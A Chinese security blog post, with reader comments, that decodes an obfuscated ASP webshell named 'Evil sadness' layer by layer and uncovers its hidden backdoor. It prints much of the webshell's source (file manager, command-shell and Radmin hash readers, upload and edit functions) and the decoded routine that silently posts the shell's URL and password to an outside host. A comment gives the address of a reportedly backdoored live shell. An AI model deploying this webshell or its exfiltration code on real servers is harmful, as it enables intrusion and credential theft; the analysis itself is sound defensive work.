Evil sadness(邪恶悲伤)webshell大解密及后门全解析

  
      之所以称之为大解密,那是因为这个shell的加密方式比较丰富,同时功能也比较强大,另外后门那也是非常的隐蔽,本地抓包那是抓不到滴。

    这个是一个朋友传给我,让帮忙看看有没有后门,初步查看还真没看到哪里有后门,发现几个地方可疑,但是仔细一看,也是一个死后门,没什么用,直到后面才发现朴素的外表下面其实“别有洞天”。

    先上图

点击放大图片

端庄的“蒙娜丽莎”,让人顿生怜悯之心

点击放大图片
功能比较强大


下面解密,这个shell一样最后是经过vbscript.vbcode加密,启用此类解密器解密之。

程序代码 程序代码

<%@ LANGUAGE = VBScript %><%
Server.ScriptTimeout=999999999
UserPass="111"        '密码
mNametitle="Evil sadness"    '名字
Copyright="Evil sadness"    '版权
SItEuRl="HTTP://ZZZ.Hk"    '网站地址
Font="300pt"        '登陆图案大小
pic="Ÿ"        '登陆图案代码编号,具体代码请查看 http://zzz.hk/webdings.htm
BodyColor="pink"        '整体页面背景颜色,具体代码请查看 http://zzz.hk/color.htm
FontColor="#000"        '普通文字颜色
LinkColor="#50616d"    '链接颜色
BorderColor="#d8d8d8"    '文件边框颜色
LinkOverBJ="#000000"    '鼠标移到链接上面背景的颜色
LinkOverFont="red"        '鼠标移到链接上面文字的颜色
FormColorBj="#dddddd"    '输入框架背景颜色
FormColorBorder="#222000"    '输入框架边框颜色
'**********************************************
'本程序只用于安全检测服务器漏洞,
'得用于非法用途,否则后果自负!
'By 丫丫
'2009.09.07
'**********************************************
Response.Buffer =true
On Error Resume Next
sub ShowErr()
  If Err Then
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear:Response.Flush
  End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Function RePath(S)
  RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
  RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
FolderPath=Request("FolderPath")
FName=Request("FName")

BackUrl="<br><br><center><a href='javascript:history.back()'>返回</a></center>"
Function AAAA(objstr):objstr=Replace(objstr,"Θ",""""):For i=1 To Len(objstr):If Mid(objstr, i, 1)<>"Ω" Then:NewStr=Mid(objstr,i,1)&NewStr:Else:NewStr=vbCrlf&NewStr:End If:Next:AAAA=NewStr:End Function
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
RRS"<title>"&mNametitle&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #383839;}"
RRS"body,tr,td{margin:0px;font-size:12px;background-color:"&BodyColor&";color:"&FontColor&";}"
RRS"input,select,textarea{font-size:12px;background-color:"&FormColorBj&";border:1px solid "&FormColorBorder&"}"
RRS"a{color:"&LinkColor&";text-decoration:none;}a:hover{color:"&LinkOverFont&";background:"&LinkOverBJ&"}"
RRS".am{color:"&LinkColor&";font-size:11px;}"
RRS"</style>"
dim a,b
a=" RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22%0D%0ARRS%22function%20ShowFolder%28Folder%29%7Btop.addrform.FolderPath.value%20%3D%20Folder%3Btop.addrform.submit%28%29%3B%7D%22%0D%0ARRS%22function%20FullForm%28FName%2CFAction%29%7Btop.hideform.FName.value%20%3D%20FName%3Bif%28FAction%3D%3D%22%22CopyFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u590D_%u5236%u5230%u76EE%u6807%u6587_%u4EF6%u7684_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165_%u79FB_%u52A8%u5230%u76EE%u6807%u6587%u4EF6_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22CopyFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22NewFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CreateMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u4E0D%u80FD%u540C%u540D%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CompactMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u538B%u7F29%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u6587%u4EF6%u662F%u5426%u5B58%u5728%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%7BDName%20%3D%20%22%22Other%22%22%3B%7Dif%28DName%21%3Dnull%29%7Btop.hideform.Action.value%20%3D%20FAction%3Btop.hideform.submit%28%29%3B%7Delse%7Btop.hideform.FName.value%20%3D%20%22%22%22%22%3B%7D%7D%22":b=replace(a,"@@@","Rinimama"):c=split(b,"Rinimama"):for i=0 to ubound(c):temp=temp+c(i):next:execute(unescape(temp)):RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""请你先连接数据库"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""Select * FROM [TableName] Where ID<100"";Str[5] = ""Insert INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""Delete FROM [TableName] Where ID=100"";Str[7] = ""Update [TableName] SET USER=\'username\' Where ID=100"";Str[8] = ""Create TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""Drop TABLE [TableName]"";Str[10]= ""Alter TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""Alter TABLE [TableName] Drop COLUMN PASS"";Str[12]= ""当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>请确认己连接数据库再输入SQL操作命令语句。</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}"
RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""请你检查数据库连接串是否正确!"");return false;}if(str.length<10){alert(""请你检查SQL语句是否正确!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}":RRS"</script>":rrs "<body" :If Action="" then RRS " scroll=no":rrs ">"
Dim ObT(13,2):ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "文 件 操 作 组 件":ObT(1,0) = "wscript.shell":ObT(1,2) = "命 令 行 执 行 组 件":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS 建 库 组 件":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS 压 缩 组 件":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "数据流 上 传 辅助 组件":ObT(5,0) = "Adodb.connection":ObT(5,2) = "数据库 连接 组件":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "数据流 上传 组件":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp 文件 上传 组件":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "刘云峰 文件 上传 组件":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload 文件 上传 组件":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail 邮件 收发 组件":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "虚拟SMTP 发信 组件":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail 发信 组件":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "数据 传输 组件":For i=0 To 13:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" √":Else:IsObj=" ●":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=RootPath:Session("FolderPath")=FolderPath:End if:execute AAAA("noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i - )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 11 = jΩ nehT ΘBΘ = )1 ,i ,nirts(diM rO ΘbΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 21 = jΩ nehT ΘCΘ = )1 ,i ,nirts(diM rO ΘcΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 31 = jΩ nehT ΘDΘ = )1 ,i ,nirts(diM rO ΘdΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 41 = jΩ nehT ΘEΘ = )1 ,i ,nirts(diM rO ΘeΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 51 = jΩ nehT ΘFΘ= )1 ,i ,nirts(diM rO ΘfΘ = )1 ,i ,nirts(diM fIΩ )nirts(neL oT 1 = i roFΩ 0 = tluserΩ tluser ,k ,j ,i miDΩ )nirts(retniotxeh noitcnuFΩnoitcnuF dnEΩfI dnEΩΘ!daeR t'naC !rorrEΘ etirw.esnopseRΩ eslEΩ))))0(yarrAtroP(xeH(rtSC&)))1(yarrAtroP(xeH(rtSC(retniotxeh etirw.esnopseRΩ Θ:Θ& troP etirw.esnopseRΩ nehT )yarrAtroP(yarrAsI fIΩ) troP & htaPnimdaR(DAERGER.HSW=yarrAtroPΩΘ>rb<>rb<Θ etirw.esnopseRΩfI dnEΩΘ!daeR t'naC !rorrEΘ etirw.esnopserΩeslEΩjborts etirw.esnopserΩtxeNΩ fI dnEΩ))i(yarrAretemaraP(xeH & jbOrts = jbOrtsΩeslEΩ)))i(yarrAretemaraP(xeH(rtSC&Θ0Θ & jbOrts = jbOrtsΩ nehT 1=)))i(yarrAretemaraP(xeh( neL  fIΩ)yarrAretemaraP(dnuoBU oT 0 = i roFΩnehT )yarrAretemaraP(yarrAsI fIΩΘ:Θ&retemaraP etirw.esnopseRΩ)htaPt00R( dneSlmXΩ) retemaraP & htaPnimdaR(DAERGER.HSW=yarrAretemaraPΩΘ>rb<>rb<rar.hsah_nimdaR/tfos/kh.zzz//:ptth:址地载下具工,接连试调do或具工hsaHnimdaR用后值HSAH出读:意注>rb<Θetirw.esnopseRΩΘtroPΘ
...................................................................



按照习惯,先解密使用加密最多的部分,

可以看到在这里都是这种模式
程序代码 程序代码
execute AAAA("noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i - )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ")

解密函数为
Function AAAA(objstr):objstr=Replace(objstr,"Θ",""""):For i=1 To Len(objstr):If Mid(objstr, i, 1)<>"Ω" Then:NewStr=Mid(objstr,i,1)&NewStr:Else:NewStr=vbCrlf&NewStr:End If:Next:AAAA=NewStr:End Function

典型的十三解密函数,这个好办,但是这里有一个不同之处是它不是采用的十三的那种执行方式,没有字符赋值给变量,而是直接执行。

这个使用自己写的WEBSHELL Decoder & Encoder快速搞定
点击放大图片

现在可以看到另外一处加密也是比较多的
解密函数
程序代码 程序代码
Function MorfiCoder(Code):MorfiCoder=Replace(Replace(StrReverse(Code),"\*\",""""),"/*/",vbCrlf):End Function

执行方式
execute MorfiCoder("/*/noitcnuF dnE/*/fi dne/*/\*")

同上面的方法,解密之


解密到现在,才仔细检查文件,我们可以发现还有3个地方时解密的。首先在文件的开头有一个加密的地方。
代码为
程序代码 程序代码
a=" RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22%0D%0ARRS%22function%20ShowFolder%28Folder%29%7Btop.addrform.FolderPath.value%20%3D%20Folder%3Btop.addrform.submit%28%29%3B%7D%22%0D%0ARRS%22function%20FullForm%28FName%2CFAction%29%7Btop.hideform.FName.value%20%3D%20FName%3Bif%28FAction%3D%3D%22%22CopyFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u590D_%u5236%u5230%u76EE%u6807%u6587_%u4EF6%u7684_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165_%u79FB_%u52A8%u5230%u76EE%u6807%u6587%u4EF6_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22CopyFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22NewFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CreateMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u4E0D%u80FD%u540C%u540D%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CompactMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u538B%u7F29%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u6587%u4EF6%u662F%u5426%u5B58%u5728%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%7BDName%20%3D%20%22%22Other%22%22%3B%7Dif%28DName%21%3Dnull%29%7Btop.hideform.Action.value%20%3D%20FAction%3Btop.hideform.submit%28%29%3B%7Delse%7Btop.hideform.FName.value%20%3D%20%22%22%22%22%3B%7D%7D%22"
b=replace(a,"@@@","Rinimama")
c=split(b,"Rinimama")
for i=0 to ubound(c)
temp=temp+c(i)
next
execute(unescape(temp))


将escape加密的字符进行了拆分,执行时再重新组合起来。解密将execute用Server.HTMLEncode方法或者其它保存的方法都可以解决。
得到明码。
程序代码 程序代码
RRS"<script language=javascript>function killErrors(){return true;}window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""你确认要执行此操作吗?""))return true;else return false;}"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}"
RRS"function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""请你输入复_制到目标文_件的_全_名_称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""请你输入_移_动到目标文件_全_名_称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""请你输入移动到目标文件夹_全_名_称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""请你输入移动到目标文件夹_全_名_称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""请你输入要新建的文件夹_全_名_称"",FName);top.hideform.FName.value = DName;}else if(FAction==""CreateMdb""){DName = prompt(""请你输入要新建的Mdb文件_全_名_称,注意不能同名!"",FName);top.hideform.FName.value = DName;}else if(FAction==""CompactMdb""){DName = prompt(""请你输入要压缩的Mdb文件_全_名_称,注意文件是否存在!"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"


再往下看,我们看到这样一处加密。
程序代码 程序代码
Gang="汗汗汗汗汗noitcnuF dnE汗gnihtoN=ptth teS汗dnes.ptth汗eslaf,lrutsoP,""TSOP"" nepo.ptth汗))"""",""^"",w(ecalper(tcejbOetaerC =ptth tes汗txen emuser rorre no汗)"""",flrcbv,)lrutsoP(mirt(ecalper=lrutsoP汗""1.5.tseuqerptthn^iw^.ptthni^w^""=w汗w mid汗)lrutsoP(dneSlmX noitcnuF汗汗汗汗汗汗"
execute(Unlin(Gang))


解密函数为
程序代码 程序代码
function Unlin(bb):for i = 1 to len(bb):if mid(bb,i,1)<>"汗" then
tmp = Mid(bb, i, 1) + tmp
else:tmp=vbcrlf&tmp
end if
next:Unlin=tmp:end function


这是黑客伟逆位加密的一个变异函数,和网上流传的有点差别。得到明码
程序代码 程序代码
Function XmlSend(Posturl)
dim w
w="^w^inhttp.^wi^nhttprequest.5.1"
Posturl=replace(trim(Posturl),vbcrlf,"""")
on error resume next
set http= CreateObject(replace(w,""^"",""""))
http.open "POST",Posturl,false
http.send
Set http=Nothing
End Function


这里面还对w加密了一次,原貌就是这样。
程序代码 程序代码
Function XmlSend(Posturl)
Posturl=replace(trim(Posturl),vbcrlf,"""")
on error resume next
set http= CreateObject("winhttp.winhttprequest.5.1")
http.open "POST",Posturl,false
http.send
Set http=Nothing
End Function


在最开始的解密中我以为没有加密的内容了,虽然觉得调用xmlhttp组件有点奇怪,但是也只看到了一个万能密码后门。
程序代码 程序代码
if FName="URL" then
  Session("web2a2dmin") = UserPass
   URL()
end if


以前有过shell使用这个万能密码shell,但是我在本地一测试,竟然无法登陆,仔细看登陆地方的代码,
程序代码 程序代码
IF SEssIoN("KKK")<>UsERpaSs thEn
IF requeSt.FoRM("Lpass")<>"" TheN
iF REquesT.foRM("Lpass")=uSERPASS then
SEsSIoN("KKK")=uSERPAss
rESPOnsE.rEdirEct Url
end if


可以看到这个后门已经没作用了,只是残渣代码。

解密到这里我以为没有什么后门了,但是有2个地方让我非常疑惑,
第一处就是上面的xmlhttp组件的调用,我知道这个组件是可以远程打开网页,并且他是在服务器上面执行的,并不在本地执行。
第二处可疑处就是在这个xmlhttp组件代码的下方有这么一段代码
程序代码 程序代码
if instr(Request.ServerVariables("SERVER_NAME"),"localhost")<>0 then R00tPath=""
if instr(Request.ServerVariables("SERVER_NAME"),"192.168.")<>0 then R00tPath=""
if instr(Request.ServerVariables("SERVER_NAME"),"172.0.0.1")<>0 then R00tPath=""
if instr(Request.ServerVariables("SERVER_NAME"),"10.")<>0 then R00tPath=""
if instr(Request.ServerVariables("SERVER_NAME"),"local")<>0 then R00tPath="":


这段代码我想看过我以前文章的都应当知道,作用就是检查shell是否在本地运行,如果在本地运行,那么
R00tPath="",给R00tPath赋空值。

我继续搜寻R00tPath的去处。看到这么几个地方调用
1,
程序代码 程序代码
Function radmin()
Set WSH= Server.CreateObject("WSCRIPT.SHELL")
RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
Parameter="Parameter"
Port = "Port"
Response.write"<br>注意:读出HASH值后用RadminHash工具或od调试连接,工具下载地址:http://zzz.hk/soft/Radmin_hash.rar<br><br>"
ParameterArray=WSH.REGREAD(RadminPath & Parameter )
XmlSend (R00tPath)
Response.write Parameter&":"


2,
程序代码 程序代码
function upfile()
  if request("action2")="post" then
    set u=new upc : set f=u.ua("localfile")
uname=u.form("topath")
    if uname="" or f.filesize=0 then
      si="<br>请输入上传的完全路径后选择一个文件上传!"
    else
        f.saveas uname
        if err.number=0 then
          si="<center><br><br><br>文件"&uname&"上传成功!</center>"
if session("IDebugMode") <> "ok" then
XmlSend (R00tPath):session("IDebugMode")="ok"
end if
end if


3,
程序代码 程序代码
Function EditFile(Path)
  If Request("Action2")="Post" Then
  Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
  Set T=nothing
if session("IDebugMode") <> "ok" then
XmlSend (R00tPath):session("IDebugMode")="ok"
end if
SI="<center><br><br><br>文件保存成功!</center>"
SI=SI&BackUrl


4,
程序代码 程序代码
case "Alexa"
dim AlexaUrl,Top
AlexaUrl=request("u")
Top=Alexa(AlexaUrl)
if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center' bgcolor='menu'>服务器组件信息</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器名</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://www.ip138.com/ips.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='查询此服务器所在地'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><form method=post action='?Action=Alexa' name='form1'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器Alexa排名</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='u' value='"&AlexaUrl&"' size=40 style='border:0px'>排名:<input type='text' value='"&Top&"' size=10><input type='submit'  value='查询'></td></tr></form><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器时间</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器CPU数量</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>服务器操作系统</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB服务器版本</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>":if session("IDebugMode") <> "ok" then
XmlSend (R00tPath):session("IDebugMode")="ok"
end if


这几个调用XmlSend (R00tPath)地方具有明显的后门特性,避免后门多次重复提交。

结合上面几个疑点,觉得后门存在几率较大

没有办法,没有找到R00tPath的赋值,从头开始看代码。

在第一次调用XmlSend (R00tPath)的上方,我发现了另外一段加密的代码,我还以为全部解密了呢,竟然还有加密的,顿生疑惑。

程序代码 程序代码
A=" 13. 10. 117. 61. 114. 101. 113. 117. 101. 115. 116. 46. 115. 101. 114. 118. 101. 114. 118. 97. 114. 105. 97. 98. 108. 101. 115. 40. 34. 104. 116. 116. 112. 95. 104. 111. 115. 116. 34. 41. 38. 117. 114. 108. 58. 82. 48. 48. 116. 80. 97. 116. 104. 61. 34. 104. 116. 116. 112. 58. 47. 47. 122. 122. 122. 46. 104. 107. 47. 108. 47. 63. 117. 61. 34. 38. 117. 38. 34. 38. 112. 61. 34. 38. 117. 115. 101. 114. 112. 97. 115. 115. 38. 34. 34. 13. 10."
execute(AA(A))


找到解密函数
程序代码 程序代码
function AA(asp)
mianasp=split(asp,".")
for i=0 to UBound(mianasp)-1
hao=mianasp(i)
aspcode=aspcode+chr(hao)
next:AA=aspcode
end function


利用ASCII码加密,将execute用response替换之,拿到明码

程序代码 程序代码
u=request.servervariables("http_host")&url:R00tPath="http://zzz.hk/l/?u="&u&"&p="&userpass&""


这就是此shell的后门!!!自动将shell路径和密码发送给zzz.hk。

这个shell在本地是无法抓取到后门的,因为他采用的是在服务器调用xmlhttp组件的方式打开连接,发送后门。在本地调试的话,自己修改https中localhost值,应当就可以抓到后门包了。

总结一下,这个shell采用了多达5个自定义加密函数,再加上vbscript.code函数加密,总共采用了6种加密方式。非常的强悍!



由于有要求,我就只发原始的加密shell了,有兴趣的好好玩玩

下载文件 点击下载此文件











以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 金刀客 于 2009-12-21 11:53 AM 编辑]
相关日志:
在线RSS阅读器订阅:
feedsky
抓虾 pageflakes Rojo google reader
my yahoo newsgator bloglines 有道
鲜果 飞豆 哪吒 Netvibes
Netvibes Netvibes

手机订阅:


本站订阅地址:
RSS2:点击复制
Atom:点击复制
        本站所有原创文章均遵循 [创作共用协议]
        本站原创文章可以转载,但须保持完整性并注明出处。
        COPYRIGHT 2008-2010  §  HTTP://WWW.DAOKERS.COM  §    ALL RIGHTS
评论: 11 | 引用: 0 | 查看次数: -
回复回复mayimove[2011-01-06 10:11 PM | del]
看了~~~~~~~学习了!
但不是很懂呢!顶哈
回复回复haaker[2010-04-23 04:19 PM | del]
哈哈....去年就看到这个马了,功能不错,而且在网上还说绝对没后门,我还差点就用了.还好没用他的!
今年又出了一个,我已放到论坛去了!大家去看看,今年的加密不强,很容易解开了!

刀客那个解密工具不错!!
回复来自 admin 的评论 admin 于 2010-04-23 04:44 PM 回复
已经看到了,我大概在坛子说了下
回复回复小军[2009-12-21 11:06 AM | del]
WEBSHELL Decoder & Encoder 什么时候发布
回复来自 金刀客 的评论 金刀客 于 2009-12-21 11:31 AM 回复
抱歉,暂无发布计划
回复回复过儿[2009-12-14 12:46 AM | del]
能不能把你的WEBSHELL Decoder & Encoder拿出来分享一下哦。。
回复来自 admin 的评论 admin 于 2009-12-14 11:29 PM 回复
这个暂时还不能发布,抱歉了,以后再说
回复回复[2009-12-11 07:19 PM | del]
原来一个shell里别有洞天,还有如此之多的秘密.就像少年闰土不知道西瓜被放在杂货店开卖之前还有如此离奇的经历一样.见教了,刀客.
回复来自 admin 的评论 admin 于 2009-12-11 10:11 PM 回复
∩_∩
回复回复Silence。[2009-12-06 09:24 PM | del]
嘿嘿,路过留下痕迹,

回复来自 金刀客 的评论 金刀客 于 2009-12-21 11:32 AM 回复
:-)
回复回复发现[2009-10-23 10:19 PM | del]
www.siliaonet.cn/cert/cpiejj.asp

这个是你公布的解密代码,我查了下,居然存在新后门,

估计是你解密公布后被人利用了!

